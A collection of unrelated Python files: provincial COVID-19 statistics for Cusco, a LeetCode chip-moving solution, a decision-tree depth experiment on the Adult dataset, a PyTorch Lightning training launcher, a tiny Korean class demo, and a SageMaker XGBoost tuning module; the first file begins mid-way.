fallecidos_adolescencia_cusco_espinar = _casos(casos_fallecidos, provincia="ESPINAR", edad_min=12, edad_max=18)
fallecidos_juventud_cusco_espinar = _casos(casos_fallecidos, provincia="ESPINAR", edad_min=19, edad_max=26)
fallecidos_adultez_cusco_espinar = _casos(casos_fallecidos, provincia="ESPINAR", edad_min=27, edad_max=59)
fallecidos_persona_mayor_cusco_espinar = _casos(casos_fallecidos, provincia="ESPINAR", edad_min=60)

#!Cusco-Convencion
poblacion_cusco_convencion = 186667
positivos_cusco_convencion = _casos(casos_positivos, provincia="LA CONVENCION")
positivos_hombres_cusco_convencion = _casos(casos_positivos, provincia="LA CONVENCION", sexo="MASCULINO")
positivos_mujeres_cusco_convencion = _casos(casos_positivos, provincia="LA CONVENCION", sexo="FEMENINO")
fallecidos_cusco_convencion = _casos(casos_fallecidos, provincia="LA CONVENCION")
fallecidos_hombres_cusco_convencion = _casos(casos_fallecidos, provincia="LA CONVENCION", sexo="MASCULINO")
fallecidos_mujeres_cusco_convencion = _casos(casos_fallecidos, provincia="LA CONVENCION", sexo="FEMENINO")
fallecidos_preinfancia_cusco_convencion = _casos(casos_fallecidos, provincia="LA CONVENCION", edad_min=0, edad_max=5)
fallecidos_infancia_cusco_convencion = _casos(casos_fallecidos, provincia="LA CONVENCION", edad_min=6, edad_max=11)
fallecidos_adolescencia_cusco_convencion = _casos(casos_fallecidos, provincia="LA CONVENCION", edad_min=12, edad_max=18)
fallecidos_juventud_cusco_convencion = _casos(casos_fallecidos, provincia="LA CONVENCION", edad_min=19, edad_max=26)
fallecidos_adultez_cusco_convencion = _casos(casos_fallecidos, provincia="LA CONVENCION", edad_min=27, edad_max=59)
fallecidos_persona_mayor_cusco_convencion = _casos(casos_fallecidos, provincia="LA CONVENCION", edad_min=60)
# Paruro province: population, infections/deaths by sex, deaths by life stage.
poblacion_cusco_paruro = 29818
_p_paruro = casos_positivos[casos_positivos['PROVINCIA'] == "PARURO"]
positivos_cusco_paruro = _p_paruro.shape[0]
positivos_hombres_cusco_paruro = _p_paruro[_p_paruro['SEXO'] == "MASCULINO"].shape[0]
positivos_mujeres_cusco_paruro = _p_paruro[_p_paruro['SEXO'] == "FEMENINO"].shape[0]
_f_paruro = casos_fallecidos[casos_fallecidos['PROVINCIA'] == "PARURO"]
fallecidos_cusco_paruro = _f_paruro.shape[0]
fallecidos_hombres_cusco_paruro = _f_paruro[_f_paruro['SEXO'] == "MASCULINO"].shape[0]
fallecidos_mujeres_cusco_paruro = _f_paruro[_f_paruro['SEXO'] == "FEMENINO"].shape[0]
# Deaths by life stage, both age bounds inclusive.
fallecidos_preinfancia_cusco_paruro = _f_paruro[_f_paruro['EDAD_DECLARADA'].between(0, 5)].shape[0]
fallecidos_infancia_cusco_paruro = _f_paruro[_f_paruro['EDAD_DECLARADA'].between(6, 11)].shape[0]
fallecidos_adolescencia_cusco_paruro = _f_paruro[_f_paruro['EDAD_DECLARADA'].between(12, 18)].shape[0]
fallecidos_juventud_cusco_paruro = _f_paruro[_f_paruro['EDAD_DECLARADA'].between(19, 26)].shape[0]
fallecidos_adultez_cusco_paruro = _f_paruro[_f_paruro['EDAD_DECLARADA'].between(27, 59)].shape[0]
fallecidos_persona_mayor_cusco_paruro = _f_paruro[_f_paruro['EDAD_DECLARADA'] >= 60].shape[0]
# Paucartambo province: population, infections/deaths by sex, deaths by life stage.
poblacion_cusco_paucartambo = 51150
_p_pauc = casos_positivos[casos_positivos['PROVINCIA'] == "PAUCARTAMBO"]
positivos_cusco_paucartambo = _p_pauc.shape[0]
positivos_hombres_cusco_paucartambo = _p_pauc[_p_pauc['SEXO'] == "MASCULINO"].shape[0]
positivos_mujeres_cusco_paucartambo = _p_pauc[_p_pauc['SEXO'] == "FEMENINO"].shape[0]
_f_pauc = casos_fallecidos[casos_fallecidos['PROVINCIA'] == "PAUCARTAMBO"]
fallecidos_cusco_paucartambo = _f_pauc.shape[0]
fallecidos_hombres_cusco_paucartambo = _f_pauc[_f_pauc['SEXO'] == "MASCULINO"].shape[0]
fallecidos_mujeres_cusco_paucartambo = _f_pauc[_f_pauc['SEXO'] == "FEMENINO"].shape[0]
# Deaths by life stage, both age bounds inclusive.
fallecidos_preinfancia_cusco_paucartambo = _f_pauc[_f_pauc['EDAD_DECLARADA'].between(0, 5)].shape[0]
fallecidos_infancia_cusco_paucartambo = _f_pauc[_f_pauc['EDAD_DECLARADA'].between(6, 11)].shape[0]
fallecidos_adolescencia_cusco_paucartambo = _f_pauc[_f_pauc['EDAD_DECLARADA'].between(12, 18)].shape[0]
fallecidos_juventud_cusco_paucartambo = _f_pauc[_f_pauc['EDAD_DECLARADA'].between(19, 26)].shape[0]
fallecidos_adultez_cusco_paucartambo = _f_pauc[_f_pauc['EDAD_DECLARADA'].between(27, 59)].shape[0]
fallecidos_persona_mayor_cusco_paucartambo = _f_pauc[_f_pauc['EDAD_DECLARADA'] >= 60].shape[0]
# Quispicanchi province: population, infections/deaths by sex, deaths by life stage.
poblacion_cusco_quispicanchi = 92060
_p_quis = casos_positivos[casos_positivos['PROVINCIA'] == "QUISPICANCHI"]
positivos_cusco_quispicanchi = _p_quis.shape[0]
positivos_hombres_cusco_quispicanchi = _p_quis[_p_quis['SEXO'] == "MASCULINO"].shape[0]
positivos_mujeres_cusco_quispicanchi = _p_quis[_p_quis['SEXO'] == "FEMENINO"].shape[0]
_f_quis = casos_fallecidos[casos_fallecidos['PROVINCIA'] == "QUISPICANCHI"]
fallecidos_cusco_quispicanchi = _f_quis.shape[0]
fallecidos_hombres_cusco_quispicanchi = _f_quis[_f_quis['SEXO'] == "MASCULINO"].shape[0]
fallecidos_mujeres_cusco_quispicanchi = _f_quis[_f_quis['SEXO'] == "FEMENINO"].shape[0]
# Deaths by life stage, both age bounds inclusive.
# (The original section comment mistakenly said "Paucartambo".)
fallecidos_preinfancia_cusco_quispicanchi = _f_quis[_f_quis['EDAD_DECLARADA'].between(0, 5)].shape[0]
fallecidos_infancia_cusco_quispicanchi = _f_quis[_f_quis['EDAD_DECLARADA'].between(6, 11)].shape[0]
fallecidos_adolescencia_cusco_quispicanchi = _f_quis[_f_quis['EDAD_DECLARADA'].between(12, 18)].shape[0]
fallecidos_juventud_cusco_quispicanchi = _f_quis[_f_quis['EDAD_DECLARADA'].between(19, 26)].shape[0]
fallecidos_adultez_cusco_quispicanchi = _f_quis[_f_quis['EDAD_DECLARADA'].between(27, 59)].shape[0]
fallecidos_persona_mayor_cusco_quispicanchi = _f_quis[_f_quis['EDAD_DECLARADA'] >= 60].shape[0]
# Urubamba province: population, infections/deaths by sex, deaths by life stage.
poblacion_cusco_urubamba = 67344
_p_uru = casos_positivos[casos_positivos['PROVINCIA'] == "URUBAMBA"]
positivos_cusco_urubamba = _p_uru.shape[0]
positivos_hombres_cusco_urubamba = _p_uru[_p_uru['SEXO'] == "MASCULINO"].shape[0]
positivos_mujeres_cusco_urubamba = _p_uru[_p_uru['SEXO'] == "FEMENINO"].shape[0]
_f_uru = casos_fallecidos[casos_fallecidos['PROVINCIA'] == "URUBAMBA"]
fallecidos_cusco_urubamba = _f_uru.shape[0]
fallecidos_hombres_cusco_urubamba = _f_uru[_f_uru['SEXO'] == "MASCULINO"].shape[0]
fallecidos_mujeres_cusco_urubamba = _f_uru[_f_uru['SEXO'] == "FEMENINO"].shape[0]
# Deaths by life stage, both age bounds inclusive.
fallecidos_preinfancia_cusco_urubamba = _f_uru[_f_uru['EDAD_DECLARADA'].between(0, 5)].shape[0]
fallecidos_infancia_cusco_urubamba = _f_uru[_f_uru['EDAD_DECLARADA'].between(6, 11)].shape[0]
fallecidos_adolescencia_cusco_urubamba = _f_uru[_f_uru['EDAD_DECLARADA'].between(12, 18)].shape[0]
fallecidos_juventud_cusco_urubamba = _f_uru[_f_uru['EDAD_DECLARADA'].between(19, 26)].shape[0]
fallecidos_adultez_cusco_urubamba = _f_uru[_f_uru['EDAD_DECLARADA'].between(27, 59)].shape[0]
fallecidos_persona_mayor_cusco_urubamba = _f_uru[_f_uru['EDAD_DECLARADA'] >= 60].shape[0]
def _provincia(name, positivos, poblacion, hombres_inf, mujeres_inf,
               fallecidos, hombres_fall, mujeres_fall,
               preinfancia, infancia, adolescencia, juventud, adultez, mayor):
    """Build one province record.

    Key insertion order mirrors the original literal exactly ("positivos"
    before "poblacion") so the JSON serialized downstream is unchanged.
    """
    return {
        "name": name,
        "positivos": positivos,
        "poblacion": poblacion,
        "hombres_infectados": hombres_inf,
        "mujeres_infectados": mujeres_inf,
        "fallecidos": fallecidos,
        "hombres_fallecidos": hombres_fall,
        "mujeres_fallecidos": mujeres_fall,
        "type": "Provincia",
        "etapa_de_vida_fallecidos": {
            "primera_infancia": preinfancia,
            "infancia": infancia,
            "adolescencia": adolescencia,
            "juventud": juventud,
            "adultez": adultez,
            "persona_mayor": mayor,
        },
    }

# Aggregated record for the whole Cusco department, serialized to JSON below.
# Note the department-level key order ("poblacion" before "positivos") differs
# from the province-level order; both are preserved from the original.
cusco = {
    "name": "Cusco",
    "poblacion": poblacion_cusco,
    "positivos": positivos_cusco,
    "hombres_infectados": positivos_hombres_cusco,
    "mujeres_infectados": positivos_mujeres_cusco,
    "fallecidos": fallecidos_cusco,
    "hombres_fallecidos": fallecidos_hombres_cusco,
    "mujeres_fallecidos": fallecidos_mujeres_cusco,
    "type": "Departamento",
    "etapa_de_vida_fallecidos": {
        "primera_infancia": fallecidos_preinfancia_cusco,
        "infancia": fallecidos_infancia_cusco,
        "adolescencia": fallecidos_adolescencia_cusco,
        "juventud": fallecidos_juventud_cusco,
        "adultez": fallecidos_adultez_cusco,
        "persona_mayor": fallecidos_persona_mayor_cusco,
    },
    "url": "cusco",
    "provincias": [
        _provincia("Cusco", positivos_cusco_cusco, poblacion_cusco_cusco,
                   positivos_hombres_cusco_cusco, positivos_mujeres_cusco_cusco,
                   fallecidos_cusco_cusco, fallecidos_hombres_cusco_cusco,
                   fallecidos_mujeres_cusco_cusco,
                   fallecidos_preinfancia_cusco_cusco, fallecidos_infancia_cusco_cusco,
                   fallecidos_adolescencia_cusco_cusco, fallecidos_juventud_cusco_cusco,
                   fallecidos_adultez_cusco_cusco, fallecidos_persona_mayor_cusco_cusco),
        _provincia("Acomayo", positivos_cusco_acomayo, poblacion_cusco_acomayo,
                   positivos_hombres_cusco_acomayo, positivos_mujeres_cusco_acomayo,
                   fallecidos_cusco_acomayo, fallecidos_hombres_cusco_acomayo,
                   fallecidos_mujeres_cusco_acomayo,
                   fallecidos_preinfancia_cusco_acomayo, fallecidos_infancia_cusco_acomayo,
                   fallecidos_adolescencia_cusco_acomayo, fallecidos_juventud_cusco_acomayo,
                   fallecidos_adultez_cusco_acomayo, fallecidos_persona_mayor_cusco_acomayo),
        _provincia("Anta", positivos_cusco_anta, poblacion_cusco_anta,
                   positivos_hombres_cusco_anta, positivos_mujeres_cusco_anta,
                   fallecidos_cusco_anta, fallecidos_hombres_cusco_anta,
                   fallecidos_mujeres_cusco_anta,
                   fallecidos_preinfancia_cusco_anta, fallecidos_infancia_cusco_anta,
                   fallecidos_adolescencia_cusco_anta, fallecidos_juventud_cusco_anta,
                   fallecidos_adultez_cusco_anta, fallecidos_persona_mayor_cusco_anta),
        _provincia("Calca", positivos_cusco_calca, poblacion_cusco_calca,
                   positivos_hombres_cusco_calca, positivos_mujeres_cusco_calca,
                   fallecidos_cusco_calca, fallecidos_hombres_cusco_calca,
                   fallecidos_mujeres_cusco_calca,
                   fallecidos_preinfancia_cusco_calca, fallecidos_infancia_cusco_calca,
                   fallecidos_adolescencia_cusco_calca, fallecidos_juventud_cusco_calca,
                   fallecidos_adultez_cusco_calca, fallecidos_persona_mayor_cusco_calca),
        _provincia("Canas", positivos_cusco_canas, poblacion_cusco_canas,
                   positivos_hombres_cusco_canas, positivos_mujeres_cusco_canas,
                   fallecidos_cusco_canas, fallecidos_hombres_cusco_canas,
                   fallecidos_mujeres_cusco_canas,
                   fallecidos_preinfancia_cusco_canas, fallecidos_infancia_cusco_canas,
                   fallecidos_adolescencia_cusco_canas, fallecidos_juventud_cusco_canas,
                   fallecidos_adultez_cusco_canas, fallecidos_persona_mayor_cusco_canas),
        _provincia("Canchis", positivos_cusco_canchis, poblacion_cusco_canchis,
                   positivos_hombres_cusco_canchis, positivos_mujeres_cusco_canchis,
                   fallecidos_cusco_canchis, fallecidos_hombres_cusco_canchis,
                   fallecidos_mujeres_cusco_canchis,
                   fallecidos_preinfancia_cusco_canchis, fallecidos_infancia_cusco_canchis,
                   fallecidos_adolescencia_cusco_canchis, fallecidos_juventud_cusco_canchis,
                   fallecidos_adultez_cusco_canchis, fallecidos_persona_mayor_cusco_canchis),
        _provincia("Chumbivilcas", positivos_cusco_chumbivilcas, poblacion_cusco_chumbivilcas,
                   positivos_hombres_cusco_chumbivilcas, positivos_mujeres_cusco_chumbivilcas,
                   fallecidos_cusco_chumbivilcas, fallecidos_hombres_cusco_chumbivilcas,
                   fallecidos_mujeres_cusco_chumbivilcas,
                   fallecidos_preinfancia_cusco_chumbivilcas, fallecidos_infancia_cusco_chumbivilcas,
                   fallecidos_adolescencia_cusco_chumbivilcas, fallecidos_juventud_cusco_chumbivilcas,
                   fallecidos_adultez_cusco_chumbivilcas, fallecidos_persona_mayor_cusco_chumbivilcas),
        _provincia("Espinar", positivos_cusco_espinar, poblacion_cusco_espinar,
                   positivos_hombres_cusco_espinar, positivos_mujeres_cusco_espinar,
                   fallecidos_cusco_espinar, fallecidos_hombres_cusco_espinar,
                   fallecidos_mujeres_cusco_espinar,
                   fallecidos_preinfancia_cusco_espinar, fallecidos_infancia_cusco_espinar,
                   fallecidos_adolescencia_cusco_espinar, fallecidos_juventud_cusco_espinar,
                   fallecidos_adultez_cusco_espinar, fallecidos_persona_mayor_cusco_espinar),
        _provincia("La Convencion", positivos_cusco_convencion, poblacion_cusco_convencion,
                   positivos_hombres_cusco_convencion, positivos_mujeres_cusco_convencion,
                   fallecidos_cusco_convencion, fallecidos_hombres_cusco_convencion,
                   fallecidos_mujeres_cusco_convencion,
                   fallecidos_preinfancia_cusco_convencion, fallecidos_infancia_cusco_convencion,
                   fallecidos_adolescencia_cusco_convencion, fallecidos_juventud_cusco_convencion,
                   fallecidos_adultez_cusco_convencion, fallecidos_persona_mayor_cusco_convencion),
        _provincia("Paruro", positivos_cusco_paruro, poblacion_cusco_paruro,
                   positivos_hombres_cusco_paruro, positivos_mujeres_cusco_paruro,
                   fallecidos_cusco_paruro, fallecidos_hombres_cusco_paruro,
                   fallecidos_mujeres_cusco_paruro,
                   fallecidos_preinfancia_cusco_paruro, fallecidos_infancia_cusco_paruro,
                   fallecidos_adolescencia_cusco_paruro, fallecidos_juventud_cusco_paruro,
                   fallecidos_adultez_cusco_paruro, fallecidos_persona_mayor_cusco_paruro),
        _provincia("Paucartambo", positivos_cusco_paucartambo, poblacion_cusco_paucartambo,
                   positivos_hombres_cusco_paucartambo, positivos_mujeres_cusco_paucartambo,
                   fallecidos_cusco_paucartambo, fallecidos_hombres_cusco_paucartambo,
                   fallecidos_mujeres_cusco_paucartambo,
                   fallecidos_preinfancia_cusco_paucartambo, fallecidos_infancia_cusco_paucartambo,
                   fallecidos_adolescencia_cusco_paucartambo, fallecidos_juventud_cusco_paucartambo,
                   fallecidos_adultez_cusco_paucartambo, fallecidos_persona_mayor_cusco_paucartambo),
        _provincia("Quispicanchi", positivos_cusco_quispicanchi, poblacion_cusco_quispicanchi,
                   positivos_hombres_cusco_quispicanchi, positivos_mujeres_cusco_quispicanchi,
                   fallecidos_cusco_quispicanchi, fallecidos_hombres_cusco_quispicanchi,
                   fallecidos_mujeres_cusco_quispicanchi,
                   fallecidos_preinfancia_cusco_quispicanchi, fallecidos_infancia_cusco_quispicanchi,
                   fallecidos_adolescencia_cusco_quispicanchi, fallecidos_juventud_cusco_quispicanchi,
                   fallecidos_adultez_cusco_quispicanchi, fallecidos_persona_mayor_cusco_quispicanchi),
        _provincia("Urubamba", positivos_cusco_urubamba, poblacion_cusco_urubamba,
                   positivos_hombres_cusco_urubamba, positivos_mujeres_cusco_urubamba,
                   fallecidos_cusco_urubamba, fallecidos_hombres_cusco_urubamba,
                   fallecidos_mujeres_cusco_urubamba,
                   fallecidos_preinfancia_cusco_urubamba, fallecidos_infancia_cusco_urubamba,
                   fallecidos_adolescencia_cusco_urubamba, fallecidos_juventud_cusco_urubamba,
                   fallecidos_adultez_cusco_urubamba, fallecidos_persona_mayor_cusco_urubamba),
    ],
}
# Emit the aggregated department record as one JSON document on stdout and
# flush so any consuming process sees it immediately.
# Fixed: a stray trailing "|" after sys.stdout.flush() (extraction artifact)
# was a SyntaxError; redundant semicolons dropped as well.
print(json.dumps(cusco))
sys.stdout.flush()
"""
数轴上放置了一些筹码,每个筹码的位置存在数组 chips 当中。
你可以对 任何筹码 执行下面两种操作之一(不限操作次数,0 次也可以):
将第 i 个筹码向左或者右移动 2 个单位,代价为 0。
将第 i 个筹码向左或者右移动 1 个单位,代价为 1。
最开始的时候,同一位置上也可能放着两个或者更多的筹码。
返回将所有筹码移动到同一位置(任意位置)上所需要的最小代价。
示例 1:
输入:chips = [1,2,3]
输出:1
解释:第二个筹码移动到位置三的代价是 1,第一个筹码移动到位置三的代价是 0,总代价为 1。
示例 2:
输入:chips = [2,2,2,3,3]
输出:2
解释:第四和第五个筹码移动到位置二的代价都是 1,所以最小总代价为 2。
提示:
1 <= chips.length <= 100
1 <= chips[i] <= 10^9
来源:力扣(LeetCode)
链接:https://leetcode-cn.com/problems/play-with-chips
著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。
"""
class Solution:
    def minCostToMoveChips(self, chips: list[int]) -> int:
        """Return the minimum total cost to move all chips to one position.

        Moves of 2 units are free, so only a chip's position parity matters:
        every chip on an even position reaches any even target for free, and
        likewise for odd.  The answer is the smaller parity count — each chip
        of the minority parity pays exactly 1 to flip parity.
        """
        # Fixed: the original annotation used typing.List, which was never
        # imported and raised NameError when the class body was executed;
        # the builtin generic list[int] needs no import.
        count_odd = count_even = 0
        for chip in chips:
            if chip % 2 == 0:
                count_even += 1
            else:
                count_odd += 1
        return min(count_even, count_odd)
|
# -*- coding: utf-8 -*-
import pandas as pd
from sklearn import tree
import matplotlib.pyplot as plt
import re
# Column names parsed from the "adult.names" metadata file: one name per
# "name: description" line, skipping blanks and '|' comment lines.
col_names = []
with open("adult.names", 'r') as f:
    for raw in f:
        stripped = raw.strip()
        if not stripped or stripped.startswith('|'):
            continue
        colon = stripped.find(':')
        if colon < 0:
            continue
        col_names.append(stripped[:colon])
# The label column is not listed in adult.names; add it explicitly.
col_names.append("income")
# Read the training dataset; the CSV has no header row, so the names parsed
# from adult.names are supplied explicitly.
training = pd.read_csv("adult.data", names = col_names, skipinitialspace = True)
X_t = pd.get_dummies(training[training.columns[:-1]]) # all columns but the last; get_dummies expands each non-numeric column into N 0/1 columns
y_t = training[training.columns[-1]] # last column (the income label)
# Read the validation dataset (its first row is a header comment, hence skiprows=1).
validation = pd.read_csv("adult.test", names = col_names, skipinitialspace = True, skiprows = 1)
# Align validation dummies to the training columns, filling categories unseen
# in validation with 0 so the feature matrices have identical shapes.
X_v = pd.get_dummies(validation[validation.columns[:-1]]).reindex(columns = X_t.columns, fill_value = 0)
y_v = validation[validation.columns[-1]]
translation = {v:v[:-1] for v in y_v.unique()} # some labels in this file carry a trailing period; strip it
y_v = y_v.replace(translation)
# Build and train a decision tree for each depth from 1 to 29, recording the
# validation accuracy of every model.
depths = range(1, 30)
accuracies = []
for depth in depths:
    classifier = tree.DecisionTreeClassifier(max_depth=depth)
    classifier.fit(X_t, y_t)
    # Export a graphviz description of the tree, substituting the raw feature
    # indices (X[n]) with the actual dummy-encoded column names.
    description = tree.export_graphviz(classifier, out_file=None)
    description = re.sub(r'X\[([0-9]+)\]', lambda match: X_t.columns[int(match.group(1))], description)
    with open("adult" + str(depth) + ".dot", 'w') as f:
        f.write(description)
    y_p = classifier.predict(X_v)
    accuracy = sum(y_p == y_v) / float(len(y_v))  # model accuracy on the validation set
    accuracies.append(accuracy)
    # Fixed: "print depth, accuracy" was a Python 2 print statement and a
    # SyntaxError under Python 3.
    print(depth, accuracy)
# Plot validation accuracy as a function of tree depth.
plt.plot(depths, accuracies)
plt.show()
# The deeper the tree, the worse the overfitting: the tree ends up memorizing
# every quirk of the training set!
|
#!/scratch_net/neo/aabhinav/anaconda3/bin/python -u
import os
import shutil
import sys
import torch
from pytorch_lightning import Trainer
from pytorch_lightning.callbacks import ModelCheckpoint
from pytorch_lightning.logging import TestTubeLogger
sys.path.append('/scratch_net/neo_second/aabhinav/dlad_project/project_02/')
# sys.path.append('/Users/abhinavaggarwal/Downloads/dlad_project/project_02/')
from mtl.experiments.experiment_semseg_with_depth import ExperimentSemsegDepth
from mtl.utils.rules import check_all_rules, pack_submission
from mtl.utils.config import command_line_parser
from mtl.utils.daemon_tensorboard import DaemonTensorboard
from mtl.utils.daemon_ngrok import DaemonNgrok
from mtl.utils.helpers import create_experiment_name, save_config
def main():
    """Train the semseg+depth multi-task model and package a submission.

    Parses the CLI config, trains (unless only preparing a submission),
    runs test-time prediction, and packs everything into an archive.
    NOTE(review): this uses the pre-1.0 pytorch-lightning API
    (TestTubeLogger, save_best_only, max_nb_epochs, ...) — confirm the
    pinned pytorch-lightning version before touching these call sites.
    """
    cfg = command_line_parser()
    cfg = create_experiment_name(cfg)
    check_all_rules(cfg)
    model = ExperimentSemsegDepth(cfg)
    logger = TestTubeLogger(
        save_dir=os.path.join(cfg.log_dir),
        name='tube',
        version=0,
    )
    save_config(cfg)
    # Keep only the best checkpoint by the (maximized) 'metric' value.
    checkpoint_callback = ModelCheckpoint(
        filepath=os.path.join(cfg.log_dir, 'checkpoints'),
        save_best_only=True,
        verbose=True,
        monitor='metric',
        mode='max',
        prefix=''
    )
    trainer = Trainer(
        logger=logger,
        checkpoint_callback=checkpoint_callback,
        # '-1' selects all available GPUs; fall back to CPU when none exist.
        gpus='-1' if torch.cuda.is_available() else None,
        show_progress_bar=cfg.log_to_console,
        max_nb_epochs=cfg.num_epochs,
        distributed_backend=None,
        print_nan_grads=False,
        weights_summary=None,
        weights_save_path=None,
        nb_sanity_val_steps=1,
    )
    daemon_tb = None
    daemon_ngrok = None
    if not cfg.prepare_submission:
        # Optionally expose training progress via TensorBoard and an ngrok tunnel.
        if cfg.tensorboard_daemon_start:
            daemon_tb = DaemonTensorboard(cfg.log_dir, cfg.tensorboard_daemon_port)
            daemon_tb.start()
        if cfg.ngrok_daemon_start:
            daemon_ngrok = DaemonNgrok(cfg.ngrok_auth_token, cfg.tensorboard_daemon_port)
            daemon_ngrok.start()
        trainer.fit(model)
    # prepare submission archive with predictions, source code, training log, and the model
    dir_pred = os.path.join(cfg.log_dir, 'predictions')
    # Remove stale predictions so the archive only contains the fresh run.
    shutil.rmtree(dir_pred, ignore_errors=True)
    trainer.test(model)
    pack_submission(cfg.log_dir)
    if daemon_tb is not None:
        daemon_tb.stop()
    if daemon_ngrok is not None:
        daemon_ngrok.stop()
if __name__ == '__main__':
    main()
|
#-*-coding: utf-8 -*-#
class Service:
    """A tiny service object bound to a user name at construction time."""

    # Class-level attribute shared by every instance of the class.
    secret="영구는 배꼽이 두 개다."
    name=""

    def __init__(self, name):
        # The constructor stores the per-object initial value.
        self.name= name

    def sum(self, a, b):
        """Print the addition result addressed to the stored name."""
        total = a + b
        print("%s님 %s+%s=%s입니다." % (self.name, a, b, total))

    def get_secret(self):
        """Return the shared class secret."""
        return self.secret
# Use the constructor when each object needs its own initial value.
pey= Service("홍길동")
print(pey.get_secret())
|
"""
A module that trains readmissions xgboost models.
"""
import json
import os
import sys
import time
import numpy as np
import pandas as pd
import shutil
from time import gmtime, strftime
import sagemaker
import boto3
from sagemaker.tuner import (
IntegerParameter,
CategoricalParameter,
ContinuousParameter,
HyperparameterTuner,
)
# import shap
import tarfile
import pickle
pd.options.mode.chained_assignment = None
from sagemaker.image_uris import retrieve
from pprint import pprint
import xgboost as xgb
def load_class_imbalances(class_imbalances_path):
    """
    Load class imbalances from a JSON file.

    Args:
        class_imbalances_path(str): Class imbalances path

    Returns:
        Parsed JSON content of the file
    """
    with open(class_imbalances_path, "r") as handle:
        return json.load(handle)
def get_best_model_path(tuning_job_result):
    """Gets the S3 model path from the tuning job outputs.

    Args:
        tuning_job_result(object): Hyperparameter tuning result as returned by
            describe_hyper_parameter_tuning_job

    Returns:
        str: S3 location of the best training job's model artifact
    """
    # NOTE(review): if "BestTrainingJob" is absent this raises TypeError on the
    # subscript below; callers only invoke this after a completed tuning job.
    best_job = tuning_job_result.get("BestTrainingJob", None)
    job_name = best_job["TrainingJobName"]
    # `smclient` is a module-level boto3 SageMaker client defined elsewhere.
    info = smclient.describe_training_job(TrainingJobName=job_name)
    model_path = info["ModelArtifacts"]["S3ModelArtifacts"]
    return model_path
def get_tuner_status_and_result_until_completion(
    tuner, num_features, target, sleep_time=60
):
    """Poll a running tuning job, printing progress, until it completes.

    Args:
        tuner(Object): The running HyperparameterTuner object
        num_features(int): Unused; kept for interface compatibility
        target(str): Target string (unused in the body; kept for compatibility)
        sleep_time(int): Seconds to wait between polls

    Returns:
        Tuple of (best rounded AUC or None, S3 path of the best model),
        returned once the tuning job status is "Completed".
    """
    while True:
        tuning_job_result = smclient.describe_hyper_parameter_tuning_job(
            HyperParameterTuningJobName=tuner.latest_tuning_job.job_name
        )
        job_count = tuning_job_result["TrainingJobStatusCounters"]["Completed"]
        status = tuning_job_result["HyperParameterTuningJobStatus"]
        auc_value = None
        # "BestTrainingJob" only appears once at least one job has finished.
        if tuning_job_result.get("BestTrainingJob", None):
            best_job = tuning_job_result["BestTrainingJob"]
            metric = best_job["FinalHyperParameterTuningJobObjectiveMetric"][
                "MetricName"
            ]
            auc_value = best_job["FinalHyperParameterTuningJobObjectiveMetric"]["Value"]
            auc_value = round(auc_value, 4)
            print("Total jobs completed: {}".format(job_count))
            print("Metric: {}".format(metric))
            print("Best AUC: {}".format(auc_value))
        else:
            print("-")
        if status == "Completed":
            model_path = get_best_model_path(tuning_job_result)
            return auc_value, model_path
        time.sleep(sleep_time)
def train_hpo(
    hyperparameter_ranges,
    container,
    execution_role,
    instance_count,
    instance_type,
    output_path,
    sagemaker_session,
    eval_metric,
    objective,
    objective_metric_name,
    max_train_jobs,
    max_parallel_jobs,
    scale_pos_weight,
    data_channels,
):
    """
    Launch a hyperparameter tuning job for an XGBoost estimator.

    Args:
        hyperparameter_ranges(dict): Dictionary of all hyperparameter ranges
        container(Object): Xgboost model docker container
        execution_role(Object): Role to enable execution of HPO job
        instance_count(int): # of instances for training job
        instance_type(str): Instance type
        output_path(str): Output path
        sagemaker_session(Object): SageMaker session
        eval_metric(str): Evaluation metric
        objective(str): Objective function name
        objective_metric_name(str): Objective function metric name
        max_train_jobs(int): Max number of training jobs to run
        max_parallel_jobs(int): Max number of jobs to run in parallel
        scale_pos_weight: Class imbalance weight scale
        data_channels(dict): Dictionary of data channels to be used for training

    Returns:
        Tuner object (the tuning job runs asynchronously after fit)
    """
    xgb_model = sagemaker.estimator.Estimator(
        container,
        execution_role,
        instance_count=instance_count,
        instance_type=instance_type,
        output_path=output_path,
        sagemaker_session=sagemaker_session,
    )
    # Fixed baseline hyperparameters; the tuner explores
    # `hyperparameter_ranges` on top of these defaults.
    xgb_model.set_hyperparameters(
        eval_metric=eval_metric,
        objective=objective,
        scale_pos_weight=scale_pos_weight,  # For class imbalance
        num_round=200,
        rate_drop=0.3,
        max_depth=5,
        subsample=0.8,
        gamma=2,
        eta=0.2,
    )
    tuner = HyperparameterTuner(
        xgb_model,
        objective_metric_name,
        hyperparameter_ranges,
        max_jobs=max_train_jobs,
        max_parallel_jobs=max_parallel_jobs,
    )
    tuner.fit(inputs=data_channels)
    return tuner
def get_best_hpo_jobs(hpo_path_pattern, folds, data_all):
    """
    Collect the best (highest-AUC) training job of every fold into one CSV.

    Args:
        hpo_path_pattern(str): Path pattern ('{}' placeholder) locating the
            per-fold HPO result CSVs; also used to build the output path
        folds(list): List of fold names
        data_all(str): Name substituted into the pattern for the combined output

    Returns:
        Tuple of (DataFrame of best jobs, output CSV path)
    """
    output_path = hpo_path_pattern.format(data_all)
    if os.path.exists(output_path):
        # A previous run already aggregated the results; reuse them.
        print(
            "Best training jobs file for each fold already created! Loading existing data..."
        )
        df = pd.read_csv(output_path)
        return df, output_path
    columns = None
    best_params = []
    for fold in folds:
        hpo_path = hpo_path_pattern.format(fold)
        df_hpo = pd.read_csv(hpo_path)
        if columns is None:
            # Output schema: the per-fold HPO columns plus the fold name.
            columns = df_hpo.columns.tolist()
            columns.append("fold")
        val_aucs = df_hpo["FinalObjectiveValue"].tolist()
        # The fold's best job is the row with the maximum validation AUC.
        max_auc = max(val_aucs)
        max_idx = val_aucs.index(max_auc)
        hpo_best_params = df_hpo.iloc[max_idx, :].tolist()
        hpo_best_params.append(fold)
        best_params.append(hpo_best_params)
    df = pd.DataFrame(best_params, columns=columns)
    # Cache the aggregate next to the fold files for subsequent runs.
    output_dir = os.path.dirname(output_path)
    os.makedirs(output_dir, exist_ok=True)
    df.to_csv(output_path, index=False)
    return df, output_path
def get_best_params(df_hpo, criteria="avg"):
    """
    Get the hyperparameters of the best HPO job based on the given criteria.

    criteria possible values: ['min', 'max', 'avg'] — 'avg' selects the
    median-AUC job so the chosen params are representative of the folds.

    Args:
        df_hpo(DataFrame): HPO results in dataframe format
        criteria(str): Selection criterion for the best params (avg/min/max)

    Returns:
        Tuple of (params dict, AUC of the selected job)

    Raises:
        ValueError: If criteria is not one of 'min', 'max', 'avg'
    """
    auc_col = "FinalObjectiveValue"
